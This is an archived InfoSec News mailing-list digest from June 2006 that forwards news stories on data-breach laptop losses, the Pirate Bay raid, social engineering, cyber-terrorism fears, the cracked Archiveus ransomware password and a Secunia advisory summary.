From isn at c4i.org Thu Jun 1 01:47:27 2006
From: isn at c4i.org (InfoSec News)
Date: Thu, 1 Jun 2006 00:47:27 -0500 (CDT)
Subject: [ISN] ACSAC 22 (Miami Beach, FL) - June 10 - extended deadline
Message-ID:

Forwarded from: ACSAC Distribution Manager

Dear colleague.

We are extending the submission deadlines for the technical track, panels, tutorials, workshop till June 10, 2006. Apologies if you receive multiple copies of this announcement.

PDF versions at
http://www.acsac.org/2006/cfp_2006.pdf
http://www.acsac.org/2006/cfp_2006-a4.pdf

---------------------------
   Call For Participation
---------------------------

Submission deadline approaching!

22nd Annual Computer Security Applications Conference
December 11-15, 2006
Miami Beach, Florida
http://www.acsac.org

                    Submission       Acceptance
                    Deadline         Notification
Technical Track     June 10, 2006    Aug. 13, 2006
Panels              June 10, 2006    Aug. 13, 2006
Tutorials           June 10, 2006    Jul. 20, 2006
Workshop            June 10, 2006    Jul. 20, 2006
Case Studies        July 1, 2006     Aug. 15, 2006
Works in Progress   Sep. 8, 2006     Oct. 1, 2006

See http://www.acsac.org/cfp for detailed submission information!

Please submit blinded papers, at most 10 pages in length at 10pt.

---------------------------------------------------------------------------

ACSAC is presented by a group of professionals who are working to facilitate information sharing among colleagues. We're an all-volunteer not-for-profit organization. Our postal address is 2906 Covington Road, Silver Spring, MD 20910-1206.

You can help ACSAC reach people who might benefit from this information. Feel free to forward this message with a personal note to your friends and colleagues. They can sign up at http://www.acsac.org/list.

We have moved to a new web host and are trying to remove duplicates from our mailing lists. If you receive duplicate messages, or simply want to be removed from our list, please reply with the word REMOVE in the subject.
From isn at c4i.org Thu Jun 1 01:47:38 2006
From: isn at c4i.org (InfoSec News)
Date: Thu, 1 Jun 2006 00:47:38 -0500 (CDT)
Subject: [ISN] Computer hacker to appeal sentence
Message-ID:

http://tvnz.co.nz/view/page/411749/735744

Jun 1, 2006

A computer hacker is to appeal against his prison sentence for internet fraud, saying it is too severe.

Aucklander Mark Hayes, 19, was sentenced last Friday in the District Court in Auckland to two years six months in prison after pleading guilty to more than 100 computer-related offenses and around $38,000 worth of fraud.

In sentencing, the Judge called Hayes a "serious recidivist computer criminal" for his offending in 2004 and reoffending while on bail in 2005.

Hayes' lawyer Peter Kaye says his client feels his sentence is too high for a person of his age and circumstances. Hayes is not eligible to apply for home detention.

The Crown Solicitor for Auckland last week described the sentence as "substantial."

Crown Solicitor Simon Moore said such offending would normally draw a jail term of three months at the most but the judge wanted to send a clear message about the seriousness of hacking.

The court heard that in 2004, Hayes used a "keystroke logger" hacking device to access the login password details of TradeMe account holders.

He used their accounts to buy $18,500 worth of computer and clothing goods, paying for them with other people's money whose bank account details he had also hacked into.

Hayes pleaded guilty. He then appeared before the court again for similar offending in 2005, again using a "keystroke logger" to get bank account details. He took around $20,000.

In sentencing, Judge David Harvey called Hayes a "serious recidivist computer criminal", ordering a jail sentence of 30 months and the repayment of around $18,000.
From isn at c4i.org Thu Jun 1 01:47:15 2006
From: isn at c4i.org (InfoSec News)
Date: Thu, 1 Jun 2006 00:47:15 -0500 (CDT)
Subject: [ISN] Security a bridge too far
Message-ID:

http://www.thesun.co.uk/article/0,,2-2006250101,00.html

By ALEX PEAKE
May 31, 2006

THE Sun yesterday exposed security at Britain's biggest naval base as a shambles after strolling unchallenged on to the bridge of a WARSHIP.

Our reporter walked through two checkpoints at Plymouth's HM Devonport - brandishing a worker's lost photo ID - before spending an hour on board the Navy's 21,578-ton flagship HMS Ocean.

Posing as a cleaner, he strolled around the deck of the giant vessel - even pausing to flick through its log books and sip tea in the galley.

Furious Royal Navy chiefs launched TWO probes last night as it emerged most of the ship's 500-strong company were on board.

The base is surrounded by a 9ft perimeter fence and guarded by security staff and scores of military police officers with alsatians.

But yesterday, armed with just workmen's overalls and the lost pass - handed to us by a concerned reader - our man gained entry after flashing the ID card over 20 yards from guards.

They waved him through and even wished him "good morning". Yet had we been terrorists, we could have caused carnage.

Within minutes our man found the quay where HMS Ocean, the Navy's largest ship, is moored for maintenance.

As ship workers and sailors filed up the gangplank, we followed them on to the warship, designed to hold 18 attack helicopters and an army of highly-trained commandos.

Two machine gun-carrying marines were checking passes. But again our man held his finger over the real workman's picture and marched in.

Once at the heart of the ship - which is on 24 hours' notice to sail anywhere in the world if a crisis breaks - he was directed by one unwitting worker to the bridge and nerve centre.
He toured the area with video gear for 15 minutes before moving to a walkway, where photographer Marc Giddings snapped him from a road.

Our reporter also saw the engine room, living quarters and anchor room.

Only one sailor asked what he was doing, but he returned to hoisting a flag when told our man was a cleaner.

We finally left the ship, praised for leading the Marines' 2003 invasion of southern Iraq, and left the base as easily as we walked in.

A Navy spokesman said: "We take all breaches of security very seriously. A full investigation by the ship and the naval base has commenced."

From isn at c4i.org Thu Jun 1 01:47:51 2006
From: isn at c4i.org (InfoSec News)
Date: Thu, 1 Jun 2006 00:47:51 -0500 (CDT)
Subject: [ISN] Employees may be opening doors to criminals
Message-ID:

http://news.ft.com/cms/s/458807fe-efec-11da-b80e-0000779e2340,dwp_uuid=863bb51c-1f76-11da-853a-00000e2511c8.html

By Kate Mackenzie
May 30 2006

Holding a security door open for someone laden with cups of coffee or a big stack of documents may seem the polite thing to do. But you may have fallen for a classic trick deployed by hackers.

The person might have been smartly dressed and looked legitimate, but that is a key part of the deception of "social engineering", which uses simple, everyday situations to deceive individuals into giving out physical or technical access to facilities that can be a mine of valuable information.

Whether getting into a building, eliciting a password over the telephone or persuading a phishing victim to e-mail their banking details, "social engineering" is responsible for more than half of security breaches, and some estimates claim the proportion is as high as 90 per cent.

Deploying a powerful firewall or maintaining up-to-date software patches on thousands of desktop machines is easy compared with raising employees' awareness of their own risky behaviour.
Last year, for example, three call centre staff at Mphasis, an Indian outsourcer, tricked several Citibank customers into revealing their Pin numbers and then stole hundreds of thousands of dollars, in an incident that rocked the outsourcing industry.

Bob Blakley, chief scientist for security and privacy at IBM's Tivoli division, says it is partly because there is no "standard set of social behaviours" for tasks such as resetting a password over the phone, so many people are easily persuaded to go along with risky procedures.

The problem is worsening, as hacking attempts and malware are increasingly used by organised criminals, rather than fame-hungry or curious geeks.

Despite a consensus that it is always people who are the weakest point in any security system, workplace prevention tactics are often neglected or relegated to a set of acceptable use policies that are largely ignored by staff.

By contrast, meticulous and detailed documents on the dishonest use of "social engineering" techniques are easily available on the internet.

One such document details a vast number of techniques, ranging from "dumpster diving" to shoulder surfing - looking over someone's shoulder as they key in a password or Pin - to "conformity": for example, telling the target that everyone else has given out their password over the phone.

Appealing to people's better nature by phoning up and pretending to be an out-of-town colleague who urgently needs to access the network is another.

In spite of all the experimentation and refinement of techniques to persuade and confuse potential "social engineering" targets, the security industry's response is almost exclusively focused on technology rather than psychology.

What can be done about it? The first thing is to take a wider view of security, says Jan Babiak, Head of Information Security at Ernst & Young. "For example in certain countries, you have a very good chance of kidnapping senior executives.
The physical security [team] take enormous precautions, but the IT people might have left something like a calendar somewhere where it's easy to hack into."

Cisco, meanwhile, urges executives to create a "top-down" culture of security awareness instead of palming off all security to a separate team.

Dave Shackleford, the director of security solutions and assessment services at Vigilar, a US security consultancy, says that executives are often the softest target for "social engineering" experiments. They tend to think they are "above the law" and have access to high level information. They are also used to associating with other top-level people, says Shackleford, so their trust levels are higher.

Mr Shackleford frequently puts clients' security defences to the test by, for example, photographing staff IDs with a telephoto lens to copy them. No attempted physical test undertaken by Vigilar has failed, he says.

Mr Shackleford says companies need policies in place: "If they don't have explicit policies laid out for their employees, then they may not know any better."

Vigilar's clients act on the information gleaned from the tests in different ways, but punishing employees who fell for a "social engineering" trick is not usually one of them. "It's human nature to be helpful," says Mr Shackleford. Instead, they tend to respond by improving training and awareness procedures.

Some of Mr Shackleford's techniques are frighteningly simple: "Just phoning someone's extension can reveal if they are out of town, for example, and for how long."

Robert Chapman, chief executive of The Training Camp, which runs security awareness courses for non-IT staff, says: "All the talk and all the money really is on technology. People in a sense brag about how much they spent on their Cisco firewalls." But they overlook the obvious weaknesses.
His company recently ran the well-publicised "CD test" in London in which 100 CDs were handed out to workers in the City, promising a free Valentine's Day gift if they installed it. Once installed the CD reported back to Chapman; he says the majority of recipients did so.

Bruce Schneier, the cryptographer who also works as a security consultant, is not so sure. He believes technical security must take into account behaviours, but does not believe "social engineering" can be adequately guarded against by training: "Have you ever met a user?" he replies when asked about efforts to improve staff awareness.

Technology, Mr Schneier says, must be more tailored to each user's needs and risk levels. Does a typical office worker, for example, need to have access to a USB port or even a CD drive?

"This is not just a 'get some guys on and solve it' problem," says Schneier. "It's like murder, burglary - all of these things, they've been around for ever."

From isn at c4i.org Thu Jun 1 01:48:50 2006
From: isn at c4i.org (InfoSec News)
Date: Thu, 1 Jun 2006 00:48:50 -0500 (CDT)
Subject: [ISN] Police close file sharing site
Message-ID:

http://www.thelocal.se/article.php?ID=3955&date=20060531

By James Savage
31st May 2006

Police have closed down The Pirate Bay, a Sweden-based file sharing site and one of the most popular websites of its kind in the world. Three people were taken in for questioning after police raids in Sweden on Wednesday.

The trio, ages 22, 24 and 28, are suspected of violating property rights legislation, police spokesman Ulf Göranzon said.

Servers connected to the site have been impounded and the site was down on Wednesday afternoon, although the operators of The Pirate Bay have set up a temporary website to provide updates on the situation.

Some fifty policemen and women were involved in raids on ten homes and offices in Sweden. The three men taken in by police were still being questioned on Wednesday afternoon. They all have links to The Pirate Bay.
Prosecutors will decide whether to detain the men after they have been questioned.

"The suspects are not people who download files, but are people who have relations to the website," Ulf Göranzon told The Local. He would not reveal anything more about the roles that the men played.

Police have been monitoring the website and the men behind it for some time. Computers were taken during raids on the men's homes and offices to secure evidence.

"We are now going to look at how the operation is structured," Göranzon said.

"At the moment we are talking to lots of people about this case. We are still at a very early stage in our investigations," he said. He would not reveal whether police had their eyes on further suspects.

Henrik Pontén, lawyer at Antipiratbyrån (The Anti-Pirate Bureau) in Stockholm, welcomed the move to close down the site.

"It is good that the Swedish police are now prioritising this kind of crime. The copyright laws finance creativity within film, computer gaming, music and other culture," said Pontén.

"People who break copyright laws steal from the creators and movie-watching public of the future. The closure of The Pirate Bay is therefore good for all of us who enjoy new film and entertainment."

But Tobias Andersson at pressure group Piratbyrån (The Pirate Bureau), which founded The Pirate Bay, stressed that there was no copyright-protected material on the servers.

"The Anti-Pirate Bureau has clearly misled the police in this case," said Andersson. "They appear to have persuaded police who are incompetent in IT that the servers in question are full of copyright-protected material. This is a gross misuse of taxpayers' money."

Andersson also condemned the fact that police had closed down a number of other websites, including The Pirate Bureau, which he says is no longer officially linked to the Pirate Bay.

"This is the greatest infringement. The Anti-Pirate Bureau has clearly fooled the police into closing down its antagonists, The Pirate Bureau."
"We are very upset that the film industry doesn't dare to have a debate, and chooses instead to trick politicians and the police into criminalizing their opponents and a large portion of the Swedish population."

The Pirate Bay is a BitTorrent tracker, which enables people to download large files such as movies from other users.

From isn at c4i.org Fri Jun 2 01:16:58 2006
From: isn at c4i.org (InfoSec News)
Date: Fri, 2 Jun 2006 00:16:58 -0500 (CDT)
Subject: [ISN] Ernst & Young laptop loss exposes 243,000 Hotels.com customers
Message-ID:

http://www.theregister.co.uk/2006/06/01/ey_hotels_laptop/

By Ashlee Vance in Mountain View
1st June 2006

Exclusive - Ernst & Young's laptop loss unit continues to be one of the company's more productive divisions. We learn this week that the accounting firm lost a system containing data on 243,000 Hotels.com customers.

Hotels.com joins the likes of Sun Microsystems, IBM, Cisco, BP and Nokia, which have all had their employees' data exposed by Ernst & Young, as revealed here in a series of exclusive stories.

The Register can again exclusively confirm the loss of the Hotels.com customer information after having received a copy of a letter mailed out jointly by the web site and Ernst & Young. A Hotels.com spokesman also confirmed the data breach, saying Ernst & Young notified the company of the laptop loss on May 3.

The laptop in question was stolen from an Ernst & Young worker's car in Texas and did have some basic data protection mechanisms such as, erm, the need for a password.

"Recently, Hotels.com was informed by its outside auditor, Ernst & Young, that one of Ernst & Young's employees had his laptop computer stolen," Hotels.com told its customers in the letter. "Unfortunately, the computer contained certain information about customer transactions with Hotels.com, and other sites through which we provide booking services directly to customers, from 2002 through 2004.
"This information may have included your name, address and some credit or debit card information you provided at that time."

Ernst & Young in February lost one laptop that held information on what's believed to be tens of thousands of Sun, IBM, Cisco, BP and Nokia employees. It's not clear if this was the same system in the Hotels.com incident. Ernst & Young has not returned our calls seeking comment and has been reluctant to provide information on these incidents in the past.

Ernst & Young in February also lost four laptops in Miami when its workers decided to leave their systems in a hotel conference room while they went out for lunch.

Major media outlets have so far ignored the Ernst & Young laptop incidents, although they were quick to follow on our confirmation of a Fidelity data breach that saw 200,000 HP workers have their information exposed.

Ernst & Young offers a variety of security services to customers, and encourages clients to be transparent with their policies around customer data issues. The company, however, has not exactly been proactive with regard to its own issues.

From isn at c4i.org Fri Jun 2 01:17:10 2006
From: isn at c4i.org (InfoSec News)
Date: Fri, 2 Jun 2006 00:17:10 -0500 (CDT)
Subject: [ISN] Cern seeks to tighten security for data grid
Message-ID:

http://www.vnunet.com/computing/news/2157258/cern-seeks-tighten-security

Lara Williams
Computing
01 Jun 2006

Cern, the world's largest particle physics laboratory and birthplace of the web, is starting a two-year project to improve security for its worldwide data grid.

The European organisation for nuclear research identified that partner sites on the grid are a security concern; many are open access public institutions supporting the lab's projects.

Cern tests innovative technologies in partnership with industry, and has asked security specialists Stonesoft and F-Secure to test security for the launch of the large hadron collider (LHC) project next year.
The 27km underground particle accelerator will distribute large amounts of information onto the worldwide LHC computing grid.

More than 1GB per second of data will be generated and either stored at Cern or sent to 12 major computing sites and a further 100 institutes around the world for analysis.

"The results of the security trials may provide solutions which could eventually be commercially available to other organisations," said Cern spokesman Francois Grey.

Although large data grids are only starting to be used in business, Cern is seeing a lot of interest from industry. The lab is developing grids that will reach across organisational boundaries, allowing multiple institutions to share resources.

"Businesses are now becoming interested in this kind of grid," said Grey. "Its use could enable suppliers and companies to share resources and large corporations to share information between business units. Grid technology will only be adopted if the right type of security solutions are available."

Particle collisions in the LHC will create 15 petabytes per year of data, and it is due to run for a decade. The grid will have a storage and analysis infrastructure accessed by more than 7,000 scientists worldwide.

The aim of the LHC is to simulate the events taking place one millionth of a millionth of a second after the universe was created - information that could revolutionise our understanding of how the natural world works.
From isn at c4i.org Fri Jun 2 01:16:29 2006
From: isn at c4i.org (InfoSec News)
Date: Fri, 2 Jun 2006 00:16:29 -0500 (CDT)
Subject: [ISN] VA Data in Format Not Widely Used
Message-ID:

http://www.washingtonpost.com/wp-dyn/content/article/2006/05/31/AR2006053102000.html

By Christopher Lee
Washington Post Staff Writer
June 1, 2006

The sensitive personal information of 26.5 million veterans that was stolen from a Department of Veterans Affairs data analyst last month was stored in a format that could make it difficult for thieves to use, according to an internal VA memo.

In the May 5 memo, VA privacy officer Mark Whitney wrote that the critical data "may not be easily accessible" because most of it -- including names, birth dates and Social Security numbers -- was stored in a specialized, standard format used for data manipulation and statistical analysis.

The format "requires specialized application software and training" to write computer code "to access and manipulate the data for use," Whitney wrote in the memo, obtained yesterday by The Washington Post.

Ari Schwartz, deputy director of the nonprofit Center for Democracy and Technology, a privacy group, said Whitney is generally right that the information would be hard to extract. It would be easier, however, if the laptop stolen along with an external hard drive and several data disks has the software needed to view the data, he said.

"This is not nearly the type of protection they would have had if they had followed basic security procedures and encrypted this," Schwartz said.

The Whitney memo, dated two days after the burglary at the analyst's Aspen Hill home and distributed to several high-ranking VA officials, provides the first public indication that some addresses and telephone numbers were among the stolen data; it refers to such information being part of electronic files of a national survey of about 20,000 veterans in 2001.
Also stolen was an electronic spreadsheet with 6,744 records about "mustard gas veterans" -- generally, veterans who took part in chemical warfare tests during World War II. Another stolen file contains as many as 10 diagnostic codes from the treatment file of one veteran who visited the VA health-care system on 57 dates.

"These type of data contain more than limited financial information, the codes contain information about veterans' medical conditions," Rep. Bob Filner (D-Calif.) said in a statement. "It is not appropriate for this information to ever enter the public domain."

Matthew Burns, a VA spokesman, said the department has been "focused on getting notification to veterans that some of the most sensitive data was out there."

Also yesterday, VA Secretary Jim Nicholson announced that he had named Richard M. Romley, a former prosecutor from Maricopa County, Ariz., as his new special adviser for information security. Romley, a Marine Corps veteran, will evaluate the department's computer security procedures and recommend improvements.

The move follows the resignation last week of Michael H. McLendon, a VA deputy assistant secretary who learned of the May 3 burglary within hours of the crime but did not immediately tell top-ranked officials. Nicholson announced Tuesday that the employee will be fired and that Dennis M. Duffy, who has been acting assistant secretary for policy and planning, had been placed on administrative leave. The employee worked in McLendon's office, and Duffy was in charge of the division in which both worked.

Nicholson learned of the information breach on May 16 and told the public on May 22, nearly three weeks after the crime.

© 2006 The Washington Post Company

From isn at c4i.org Fri Jun 2 01:16:46 2006
From: isn at c4i.org (InfoSec News)
Date: Fri, 2 Jun 2006 00:16:46 -0500 (CDT)
Subject: [ISN] The new breed of cyber-terrorist
Message-ID:

http://news.independent.co.uk/world/science_technology/article622421.ece

By Jimmy Lee Shreeve
31 May 2006

According to cyber-security experts, the terror attacks of 11 September and 7 July could be seen as mere staging posts compared to the havoc and devastation that might be unleashed if terrorists turn their focus from the physical to the digital world.

Scott Borg, the director and chief economist of the US Cyber Consequences Unit (CCU), a Department of Homeland Security advisory group, believes that attacks on computer networks are poised to escalate to full-scale disasters that could bring down companies and kill people. He warns that intelligence "chatter" increasingly points to possible criminal or terrorist plans to destroy physical infrastructure, such as power grids. Al-Qa'ida, he stresses, is becoming capable of carrying out such attacks.

Most companies and organisations seem oblivious to the threat. Usually, they worry about e-mail viruses and low-grade hacker attacks. But Borg sees these as the least of their worries. "Up to now, executives and network professionals have worried about what adolescents and petty criminals have been doing," he says. "In most cases, these kinds of cyber attacks aren't very destructive. The reason is that businesses generally have enough inventory and extra capacity to make up for any short-term interruptions."

What companies and organisations should worry about, Borg insists, is "what grown-ups could do" - terrorists or hardcore criminals. One key target would probably be the vital Supervisory Control and Data Acquisition (Scada) systems in power plants and similar industries.
"Chatter on Scada attacks is increasing," says Borg, referring to patterns of behaviour that suggest that criminal gangs and militant groups are now fully capable of unleashing such attacks.

"Control systems are a particular worry, because these are the computer systems that manage physical processes. They open and shut the valves, adjust the temperatures, throw the switches, regulate the pressures," he says. "Think of the control systems for chemical plants, railway lines, or manufacturing facilities. Shutting these systems down is a nuisance. Causing them to do the wrong thing at the wrong time is much worse."

Until now, hackers have usually targeted credit cards or personal information on the web. More sophisticated hackers, however, are beginning to focus on databases. The type of data most likely to be hit, Borg says, might include a pharmaceutical company's drug development databases, or programs that manipulate data, such as formulas for generating financial statements.

"Many attacks of this kind would have two components. One would alter the process control system to produce a defective product. The other would alter the quality control system so that the defect wouldn't easily be detected," Borg says. "Imagine, say, a life-saving drug being produced and distributed with the wrong level of active ingredients. This could gradually result in large numbers of deaths or disabilities. Yet it might take months before someone figured out what was going on."

The result, he says, would be panic, people afraid to visit hospitals and health services facing huge lawsuits.

Deadly scenarios could occur in industry, too. Online outlaws might change key specifications at a car factory, Borg says, causing a car to "burst into flames after it had been driven for a certain number of weeks". Apart from people being injured or killed, the car maker would collapse. "People would stop buying cars." A few such attacks, run simultaneously, would send economies crashing.
Populations would be in turmoil. At the click of a mouse, the terrorists would have won.

Is Borg justified in his fears? All this sounds like a plot from a thriller; it's hard to take it seriously. But intelligence reports in the last year or so make for worrying reading. An assessment by the British security service MI5 stated that "Britain is four meals away from anarchy". And officials admit their greatest fears about electronic attacks focus on the more exposed networks that make up the "critical national infrastructure" - the systems Borg is concerned about.

US agencies are concerned that terrorists could combine electronic and physical attacks to devastating effect, such as disrupting emergency services at the same time as mounting a bomb attack.

Risk management analysts, equally edgy, are focusing on the financial impact on businesses and economies. They believe that an online attack would undermine public confidence in vital industries, especially utilities. Nick Robson, a partner at JLT Risk Solutions, says: "A cyber attack on, say, the power industry would cause communications operations to close down for a period of time, expose customers to loss of service, increase liability exposure and ultimately damage reputation for service delivery."

It isn't just Western nations that fear a digital meltdown. This month, the Malaysian government announced plans to establish a centre to fight cyber-terrorism, which will provide an emergency response to hi-tech attacks around the globe.

Prime Minister Abdullah Ahmad Badawi said the facility - to be located at the technology hub of Cyberjaya outside Kuala Lumpur - would be called the International Multilateral Partnership against Cyber-Terrorism, or Impact, and would be funded by a combination of government revenue and the private sector. Badawi said the threat of cyber-terrorism was too serious for governments to ignore.
"The potential to wreak havoc and cause disruption to people, governments and global systems has increased as the world becomes more globalised," he said. "The economic loss caused by a cyber attack can be truly severe; for example, a nationwide blackout, collapse of trading systems or the crippling of a central bank's cheque clearing system."

While the case for cyber attack appears persuasive, some believe that much of it is hype. "It's difficult to avoid comparisons with the Millennium bug and the predictions of widespread computer chaos arising from the change of date to the year 2000," says Tom Standage, technology editor at The Economist magazine. "Then, as now, the alarm was sounded by technology vendors and consultants, who stood to gain from scaremongering."

Almost £400m was spent by the Government alone on preparations for the Millennium bug. Computer consultants issued dire warnings of the danger of an information technology breakdown that could paralyse nations on New Year's Day 2000. When the clock struck midnight, however, few problems were reported. There is scepticism that the bug was ever a threat.

As far as Standage is concerned, those in the cyber-security industry - be they vendors boosting sales, academics chasing grants or politicians looking for bigger budgets - always have a "built-in incentive to overstate the risks".

But what of the Scada systems; surely they are highly vulnerable? "It is true that utility companies and other operators of critical infrastructure are increasingly connected to the internet," Standage concedes. "But just because customers pay their bills online, it doesn't follow that critical control systems are vulnerable to attack. Control systems are usually kept entirely separate from other systems, for good reason. They tend to be obscure, old-fashioned systems that are incompatible with internet technology anyhow. Even authorised users require specialist knowledge."
A simulation in 2002 by the US Naval War College concluded that an "electronic Pearl Harbor" attack on America's infrastructure would certainly cause serious disruption. But to pull it off would require five years of preparation and a $200m budget. As US computer security guru Bruce Schneier says: "If they want to attack, they will do it with bombs like they always have."

But Richard Clarke, a former cyber-security expert in the Bush administration, says this is complacent. "People claim no one will ever die in a cyber-attack, but they're wrong. This is a serious threat."

Clarke says that each time the US government has tested the security of the electric power industry, he and his colleagues have been able to hack their way in, "sometimes through an obscure route like the billing system". He reveals that computer security officers at a number of chemical plants have told him privately that they are very concerned about the openness of their networks.

Scott Borg of the Cyber Consequences Unit goes along with this. He believes the $93m budget for 2007 allocated to the Department of Homeland Security to defend against cyber attack is justified. "Even systems isolated from the internet are often accessible to thousands of employees. How secure can any system be if thousands of people and thousands of data ports can provide inside access to that system?"

The threat from software

IT security consulting firm Cyber Defense Agency (CDA) has warned the US military, government and "critical infrastructure agencies" against using outsourced commercial software which could be tampered with by terrorists.

CDA said that gas, electricity, telecommunications, banking and water companies are among the services that could fall foul of cyber terrorists exploiting "life-cycle" weaknesses buried deep in the software code. Life-cycle attacks occur when one line of code is programmed to open vulnerabilities within the software, exposing the software and the company to external threats.
"Outsourced commercial software poses a silent but significant security risk to the defence and welfare of the US," says Sami Saydjari, president of CDA. "The chances of strategic damage from a cyber-terrorist attack on the US increase the longer it takes to remedy the risks posed by outsourced software."

From isn at c4i.org Fri Jun 2 01:17:21 2006 From: isn at c4i.org (InfoSec News) Date: Fri, 2 Jun 2006 00:17:21 -0500 (CDT) Subject: [ISN] Extortion virus code gets cracked Message-ID:

http://news.bbc.co.uk/1/hi/technology/5038330.stm
1 June 2006

Do not panic if your data is hidden by virus writers demanding a ransom. Poor programming has allowed anti-virus companies to discover the password to retrieve the hijacked data inside a virus that has claimed at least one UK victim.

The Archiveus virus caught out British nurse Helen Barrow and swapped her data with a password-protected file. The virus is the latest example of so-called "ransomware" that tries to extort cash from victims.

Code breaker

Analysis of Archiveus has revealed that the password to unlock the file containing all the hijacked files is contained within the code of the virus itself. This virus swaps files found in the "My Documents" folder on Windows with a single file protected by a 30-digit password. Victims are only told the password if they buy drugs from one of three online pharmacies.

The 30-digit password locking the files is "mf2lro8sw03ufvnsq034jfowr18f3cszc20vmw". Using the password should restore all the hijacked files.

"Now the password has been uncovered, there should be no reason for anyone hit by this ransomware attack to have to make any payments to the criminals behind it," said Graham Cluley, senior technology consultant for security firm Sophos.

Archiveus was discovered on 6 May but it took the rest of the month for the first victim, Rochdale nurse Helen Barrow, to emerge.
Ms Barrow is thought to have fallen victim when she responded to an on-screen message warning her that her computer had contracted another unnamed virus. The virus asks those it infects to buy drugs on one of three websites to get their files back.

"When I realised what had happened, I just felt sick to the core," said Ms Barrow about the incident.

The Archiveus virus is only the latest in a series of malicious programs used by extortionists to extract cash from victims. Archiveus seems to use some parts of another ransoming virus called Cryzip that was circulating in March 2006.

From isn at c4i.org Fri Jun 2 01:17:32 2006 From: isn at c4i.org (InfoSec News) Date: Fri, 2 Jun 2006 00:17:32 -0500 (CDT) Subject: [ISN] Miami U. reports 2nd security breach Message-ID:

http://www.cleveland.com/news/plaindealer/index.ssf?/base/news/1149150686240780.xml&coll=2
June 01, 2006
Associated Press

An employee at a Miami University branch campus lost a hand-held personal computer containing private information on 851 students, but school officials said they don't believe that the data has been used unlawfully.

The recent case involves a potential breach of privacy that the school takes very seriously, said Kelly Cowan, interim dean at the Middletown campus. Students affected were enrolled between July 2001 and May 2006, representing about 8 percent of the students on campus during that five-year period.

It's the second security breach at Miami since last September, when officials said a report containing some private information on students was accidentally placed in a file accessible through the Internet. It included names, Social Security numbers and information on the 21,762 students enrolled on all Miami campuses in the fall of 2002.

Cowan said the school is tightening its security and increasing employee training.
From isn at c4i.org Fri Jun 2 01:17:45 2006 From: isn at c4i.org (InfoSec News) Date: Fri, 2 Jun 2006 00:17:45 -0500 (CDT) Subject: [ISN] Toronto firm at centre of security breach Message-ID:

http://www.thestar.com/NASApp/cs/ContentServer?pagename=thestar/Layout/Article_Type1&c=Article&pubid=968163964505&cid=1149113029270&col=968705899037&call_page=TS_News&call_pageid=968332188492
By TYLER HAMILTON
BUSINESS REPORTER
Jun. 1, 2006

Toronto software provider Hummingbird Ltd. has found itself at the centre of an embarrassing privacy accident involving the social security numbers of 1.3 million American students.

Hummingbird disclosed yesterday evening that one of its employees lost a piece of computer equipment that contained the names and social security numbers of customers who borrowed funds from Round Rock, Tex.-based Texas Guaranteed, a non-profit company that administers a U.S. family education loan program.

"The privacy of customer data is of utmost importance to us and we take our responsibility to safeguard it very seriously. We deeply regret that this incident has occurred," Barry Litwin, Hummingbird's president and chief executive, said in a statement. "We continue to investigate the facts surrounding this loss of information and are taking all necessary action in order to ensure that such occurrences do not happen in the future."

Hummingbird, which announced on May 26 that it is being acquired by Palo Alto, Calif.-based holding company Symphony Technology Group for $465 million (U.S.), said it has no reason to believe the equipment was stolen to obtain confidential data. The company said the equipment was password-protected and that it was "extremely unlikely" the data would be misused.

Hummingbird was given the data as part of a contract to develop a custom document management system for Texas Guaranteed.
According to information on Texas Guaranteed's Web site, the equipment was lost on May 24 but Hummingbird didn't notify the company until mid-afternoon on May 26, the day Hummingbird disclosed its deal with Symphony.

The U.S. loan provider said that customers whose information was lost will be notified over the coming weeks and given advice on how to guard against identity theft.

"Even though this information is not easily accessed and used, and even though the loss appears to be inadvertent, we are issuing this release out of an abundance of caution, because the piece of equipment has not been located," said Sue McMillin, president and CEO of Texas Guaranteed, in a statement.

The use of social security numbers as a form of identification in the United States has been a topic of considerable controversy in recent weeks. In early May, computer disks containing the social security numbers of 26.5 million U.S. veterans were stolen from the U.S. Department of Veteran Affairs, putting millions of Americans at risk of identity fraud.
From isn at c4i.org Fri Jun 2 01:18:07 2006 From: isn at c4i.org (InfoSec News) Date: Fri, 2 Jun 2006 00:18:07 -0500 (CDT) Subject: [ISN] Secunia Weekly Summary - Issue: 2006-22 Message-ID:

========================================================================

The Secunia Weekly Advisory Summary
2006-05-25 - 2006-06-01

This week: 102 advisories

========================================================================
Table of Contents:

1) Word From Secunia
2) This Week In Brief
3) This Week's Top Ten Most Read Advisories
4) Vulnerabilities Summary Listing
5) Vulnerabilities Content Listing

========================================================================
1) Word From Secunia:

The Secunia staff is spending hours every day to assure you the best and most reliable source for vulnerability information.

Every single vulnerability report is being validated and verified before a Secunia advisory is written.

Secunia validates and verifies vulnerability reports in many different ways e.g. by downloading the software and performing comprehensive tests, by reviewing source code, or by validating the credibility of the source from which the vulnerability report was issued.

As a result, Secunia's database is the most correct and complete source for recent vulnerability information available on the Internet.

Secunia Online Vulnerability Database:
http://secunia.com/

========================================================================
2) This Week in Brief:

eEye Digital Security has reported a vulnerability in Symantec Client Security and Symantec AntiVirus Corporate Edition, which can be exploited by malicious people to compromise a user's system.
Users of Symantec products are advised to view the referenced Secunia advisory for additional details and information about patches.

Reference:
http://secunia.com/SA20318

--

VIRUS ALERTS:

Secunia has not issued any virus alerts during the week.

========================================================================
3) This Week's Top Ten Most Read Advisories:

1. [SA20153] Microsoft Word Malformed Object Code Execution Vulnerability
2. [SA19762] Internet Explorer "object" Tag Memory Corruption Vulnerability
3. [SA20107] RealVNC Password Authentication Bypass Vulnerability
4. [SA19738] Internet Explorer "mhtml:" Redirection Disclosure of Sensitive Information
5. [SA20261] Cisco VPN Client Privilege Escalation Vulnerability
6. [SA19521] Internet Explorer Window Loading Race Condition Address Bar Spoofing
7. [SA18680] Microsoft Internet Explorer "createTextRange()" Code Execution
8. [SA20288] Novell Netware abend.log User Credentials Disclosure
9. [SA15601] Mozilla / Mozilla Firefox Frame Injection Vulnerability
10. [SA20300] Basic Analysis and Security Engine "BASE_path" File Inclusion

========================================================================
4) Vulnerabilities Summary Listing

Windows:
[SA20361] wodSFTP ActiveX Component Arbitrary File Access Vulnerability
[SA20318] Symantec Client Security / AntiVirus Unspecified Code Execution
[SA20407] F-Secure Products Web Console Buffer Overflow Vulnerability
[SA20357] Enigma Haber Multiple SQL Injection Vulnerabilities
[SA20355] AspSitem SQL Injection and Private Message Disclosure
[SA20348] Nukedit "groupid" Parameter Administrator Register Vulnerability
[SA20347] Hitachi HITSENSER3 SQL Injection Vulnerability
[SA20335] My Web Server Long URL Denial of Service
[SA20317] Mini-NUKE SQL Injection Vulnerabilities
